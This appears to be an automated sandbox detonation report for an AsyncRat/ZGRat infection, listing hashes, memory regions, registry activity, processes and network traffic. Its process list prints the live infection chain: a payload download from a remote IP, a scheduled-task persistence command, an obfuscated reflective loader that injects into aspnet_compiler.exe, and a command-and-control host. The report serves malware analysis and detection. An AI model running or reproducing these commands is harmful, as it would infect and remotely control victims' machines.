C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0f4f741a30afcd13b686313d31ceaac3 |
| SHA1 | eb341e2203992dbb28d7f3deb4a444eb042e70c1 |
| SHA256 | 42702e2d60b5d4319ff6fab128cb6585739e0de7080dd6f8ffe7502ef33d44da |
| SHA512 | c9d06a1c933cf1152e1c08f58c9894b31d1d42726177b8b0cb63ba82d771a997f4f165d42c0b1367085ce422f842b77854d79dfa577761db9aefd4fe5de89583 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fa896589dc101569218d9554ad8cc547 |
| SHA1 | e4f98abc82cfb45b9deff5430f5bef716b2302cc |
| SHA256 | a189c451f257e9c98f98a5a0bccb0f7c0877287ce59ef240341eac9480337db0 |
| SHA512 | 681aaec310163a19cbbad82a6ce4133ffad1e2ec1ce400e5c9cb8ee65341174b5d0f4965f9321c2f9218374d3acd87349cb2e750449b2bc56b529d53476999cf |
memory/1372-223-0x0000000001D50000-0x0000000001D51000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 7559f17b255a8b1932e72a81a240096d |
| SHA1 | 386f4a21f8c8171e7c875ef809250be6633757cf |
| SHA256 | 519310fed8e699cf88dbef66e8aabeefda883555c49f50e58bd5a86bfb945eca |
| SHA512 | 8771d4599c8ac2ec316bb8e6799ea86e846a57ce4f49609b9ade73e264cbe4896d73cbd977c0195bb7e5702ef720da9cfae01b912d3aadb49a8632f88f0e888a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PRMODDT9PNEWFNRU6KTK.temp
| MD5 | c35051a64ae0888a1ecd112759fc4fa4 |
| SHA1 | d029cd66ff74a8a6fa55d6b4addab696f6c8e97c |
| SHA256 | bd4fd9e687b305ca5db9f8359a300a7fe2eb6236a09c0360c44043097d7d860a |
| SHA512 | 7fd21af965e6dd98025567cb07397c30c0efedd2d0fc453d0943274a12227350baf58c6825db85c739a797bf1dbf7357111eebc1a5f924aac4617c85b5a97d95 |
memory/2224-232-0x00000000021D0000-0x00000000021D8000-memory.dmp
memory/2224-233-0x0000000002B80000-0x0000000002C00000-memory.dmp
memory/2224-231-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp
memory/2224-230-0x000000001B4F0000-0x000000001B7D2000-memory.dmp
memory/2224-235-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp
memory/2224-238-0x0000000002B80000-0x0000000002C00000-memory.dmp
memory/2224-237-0x0000000002B80000-0x0000000002C00000-memory.dmp
memory/2224-236-0x0000000002B80000-0x0000000002C00000-memory.dmp
C:\Users\Admin\Desktop\a.ps1
| MD5 | 7b064a6209f893bdd49ee27ab509e271 |
| SHA1 | d4cc84e215cd2b35a2241298d1782d7873399f72 |
| SHA256 | 9c3f6def8ce4f73c49f861a191e7e3e36f0e9759de9bda8b0f79ca895decb8c7 |
| SHA512 | 5f347947dbb13a5fc96c581308e0da8d9a217f4cc413a0c5fd0a216e1c6c96e789e7abd2ec1128a0b01ac6edf78b60097bca60b3ccff22aa89df23b168f875e2 |
memory/2224-239-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp
memory/320-246-0x0000000002900000-0x0000000002980000-memory.dmp
memory/320-247-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/320-245-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/320-248-0x0000000002900000-0x0000000002980000-memory.dmp
memory/320-249-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/320-250-0x0000000002900000-0x0000000002980000-memory.dmp
memory/320-251-0x0000000002900000-0x0000000002980000-memory.dmp
memory/2636-258-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/2636-259-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-262-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-261-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-260-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/2636-263-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-264-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 901e0d6f7201a7be15fb48fd447fc052 |
| SHA1 | 37142ec6982ed0d4a1785e3a6eb508c86d802a65 |
| SHA256 | f202496fa677af7806d28ca2922f268252dee7d4960b490cabe75ad0c0cd30a6 |
| SHA512 | 1e304f8de325c960f9c6c7642703fc0188ac5c91e48022e8e79d33a6e0dfcfefc86cd5fd73fd79daae647d1644160c1e93255cea10d83603227f41ccd7d0dc1b |
memory/912-278-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-279-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/912-281-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-280-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-277-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/912-282-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-283-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/912-284-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-285-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-286-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-293-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/2512-294-0x0000000002AD2000-0x0000000002AD4000-memory.dmp
memory/2512-295-0x0000000002AD0000-0x0000000002B50000-memory.dmp
memory/2512-296-0x0000000002AD0000-0x0000000002B50000-memory.dmp
memory/2512-297-0x0000000002AD0000-0x0000000002B50000-memory.dmp
memory/912-299-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/912-300-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/2852-301-0x0000000000230000-0x0000000000231000-memory.dmp
C:\Users\Admin\Desktop\aaa.vbs
| MD5 | 94d9f0f40db24e05f57932150c193171 |
| SHA1 | cc52620223564a1a5a8855edc9b86ef196b57be2 |
| SHA256 | 95eda985122dc3d7bc221b0fcef20eeb77503bb0bfa7fd5896fd511c4ddbb888 |
| SHA512 | edd628f6276656d0769f6b1c54e8c26efaa8b0fab334fe64df66c65cc86bb2c71b15b137c2373ac00a027841961c77f75ee712f3cd142e5fea3c6a211c6afcd0 |
memory/2192-310-0x0000000002A50000-0x0000000002AD0000-memory.dmp
memory/2192-311-0x0000000002A50000-0x0000000002AD0000-memory.dmp
C:\Users\Admin\Desktop\a.vbs
| MD5 | 3c15cc7a6587bd5a38b2f3695f5fdd70 |
| SHA1 | 5eb07663b508cc6288514b9d55c0bff2db78f679 |
| SHA256 | 6227ddc0d33925e3981078595fa50d52819b3cab35f2800bc81eb0860ad726a3 |
| SHA512 | 15bd0a4fb9c76121441b648a9256a16c5c7bcd3e7d84f36a3107934256f0b27da59c14738fd8becabee531ed0efee58feb0322ec36f277a4b3c11350f8bc3168 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-12 14:32
Reported
2024-03-12 14:35
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5068 set thread context of 1612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 1448 set thread context of 880 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\install.js
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 104.243.44.136:777 | 104.243.44.136 | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.44.243.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.22.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.22.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | w3llsfarg0h0st.ddns.net | udp |
| US | 104.243.37.196:2244 | w3llsfarg0h0st.ddns.net | tcp |
| US | 8.8.8.8:53 | 196.37.243.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/1120-0-0x00000207BC320000-0x00000207BC342000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_elsa5muu.rlm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1120-10-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/1120-11-0x00000207D4920000-0x00000207D4930000-memory.dmp
memory/1120-12-0x00000207D48E0000-0x00000207D4906000-memory.dmp
memory/1120-13-0x00000207D5640000-0x00000207D5654000-memory.dmp
memory/1120-14-0x00000207D4920000-0x00000207D4930000-memory.dmp
memory/1120-15-0x00000207D56D0000-0x00000207D56E2000-memory.dmp
memory/1120-16-0x00000207D56A0000-0x00000207D56AA000-memory.dmp
memory/1120-47-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
C:\Users\Public\basta.js
| MD5 | 38affda935585ad2ddc0abe0a906f404 |
| SHA1 | 8379070ec3e9b448499c53c6244c815bc566cf59 |
| SHA256 | f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa |
| SHA512 | 0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6 |
C:\Users\Public\node.bat
| MD5 | f6a91f8aa7612ef8d9f2887fd909600a |
| SHA1 | 948ac8197a43a5e50ed34241f3d74bba0222b9c7 |
| SHA256 | dd9a0df1cefd595c2b9a0cceb0a0042451b496d3c5753e2a33520de646c9ddf3 |
| SHA512 | 666339156dd8924df33adc3e0a266d2048f0e9b9ef201cedfe304ae37c99a45674abd4bf97a94ea3eb81e5d7a98f399d9770cad5dca16bf5852a692460d855ef |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | e5ab5d093e49058a43f45f317b401e68 |
| SHA1 | 120da069a87aa9507d2b66c07e368753d3061c2d |
| SHA256 | 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74 |
| SHA512 | d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a |
memory/3044-51-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/3044-52-0x000001BA7F060000-0x000001BA7F070000-memory.dmp
memory/3044-53-0x000001BA7F060000-0x000001BA7F070000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c9431378551c6d63789f4bc499aef072 |
| SHA1 | 70455c2f065fc4475f1e620defa3c60ed0444399 |
| SHA256 | 820bdd78e27f4a51dd4e759bac5d52687ec0125978bb8ae90e46e6e6df53f452 |
| SHA512 | 1e6eadc7fa53883c242a4df34ee2645c617ce26b64d1dbb87f3d532fe7c582bf47ea748a01a524d1441cb1a487abbb098e3c01a4d94b8b98c4793ecfa8a9ca15 |
memory/3044-64-0x000001BA7FDC0000-0x000001BA7FDE6000-memory.dmp
memory/3044-65-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/3652-66-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/3652-67-0x0000018F7C140000-0x0000018F7C150000-memory.dmp
memory/3652-77-0x0000018F7C140000-0x0000018F7C150000-memory.dmp
memory/3652-79-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
C:\Users\Public\shell.js
| MD5 | 3c93270c5a82e51379c4eaa91cd697d5 |
| SHA1 | 250fb007cc2b58cb67bb8c4a8b9d6f2308cc78b7 |
| SHA256 | 825858c8524555771bd602ce6a304e10144b5ec7b1f9249aef5aa5a667771e1c |
| SHA512 | ee4a491f1c4cee10bbd15a5a1f26aa16af3b3e504cb9860904b3d21d82261d739c31adbaccda44cc6107d786f84ca2ad7eeeac64c5496a257ff3c04d435c960f |
C:\Users\Public\app.js
| MD5 | 08a7e6db996774b6806c395c04116803 |
| SHA1 | d0182c34dacc8ab9c8841c8913a1ae7f4d281595 |
| SHA256 | 9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc |
| SHA512 | d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b |
C:\Users\Public\run.js
| MD5 | 166e57b73fd399b0f54c415d22b235f6 |
| SHA1 | f20bf715826dc97a5e26c7acc4310d32213cc2b7 |
| SHA256 | f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3 |
| SHA512 | e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda |
memory/5068-85-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp
memory/5068-86-0x0000022869390000-0x00000228693A0000-memory.dmp
memory/5068-92-0x0000022869390000-0x00000228693A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3d5dc472de2b37146b21b63a3173176d |
| SHA1 | 7d3dd1e9a91c497745e965b4fdbbeac28196ab45 |
| SHA256 | 75edb4ad9fc3331ff2d78383ae18095cb8163bdffaaa64e6593283bb7a17c3bb |
| SHA512 | 74bf3f56b6a31fb8745c27dd8a32a97c3923d08e76fb267ebf73bb9e7e901070ee2695437af17c4b4fad583a7591c454bd8cfd0fd7ef9e7b2691d1487f0cb1bb |
C:\Users\Public\msg.dll
| MD5 | 55a2ab1987b5dc68a293d870ff989008 |
| SHA1 | e170596b7a86e216f23f9e0187e460447f63a88f |
| SHA256 | c80df95873d89cfe623decf1e71a7b53afd7771ddf97256e59c1a848253fbb64 |
| SHA512 | ccdfe15c5daab738a889e6405a1c6daf76bcaeb651e04fa9d148b5078707c4ba2c56f8b540227d61bfda4c93b0b33487becb29c7916ac03d8c48ac0e9970e5e4 |
C:\Users\Public\runpe.dll
| MD5 | ab3151ce426cf5959813a90f452750b8 |
| SHA1 | 271198005f634f22c0f84358a00b7aff302e712b |
| SHA256 | a9e0964b0bcbd52e1344af7f25977128860f81eb3173fcdc8f00d448a6e6e578 |
| SHA512 | 5ff0856cbfc649f89ae7e1997d819b2d6593a56c36758bf45f1e59ac74fe8599007b08752b76424f9eb540af87bc89c1fa58bbf81b9967fc3c6fff897ec0975b |
C:\Users\Public\xx.dll
| MD5 | 14c2a6b7bf15e15d8dae9cd4a56432d5 |
| SHA1 | 0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016 |
| SHA256 | 79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96 |
| SHA512 | e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d |
C:\Users\Public\type.dll
| MD5 | be784e48d0174367297b636456c7bcf1 |
| SHA1 | 8c906d9e0e2439238b3263e087aee3d98fa86dea |
| SHA256 | 510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136 |
| SHA512 | aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4 |
C:\Users\Public\load.dll
| MD5 | f19dbf2edb3a0bd74b0524d960ff21eb |
| SHA1 | ddcb77ff769ea54ca622848f6bedd4004fa4f4fa |
| SHA256 | 8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3 |
| SHA512 | f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216 |
C:\Users\Public\method.dll
| MD5 | 38b97710070dbdd7b3359c0d52da4a72 |
| SHA1 | 4ce08d2147c514f9c8e1f83d384369ec8986bc3b |
| SHA256 | 675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7 |
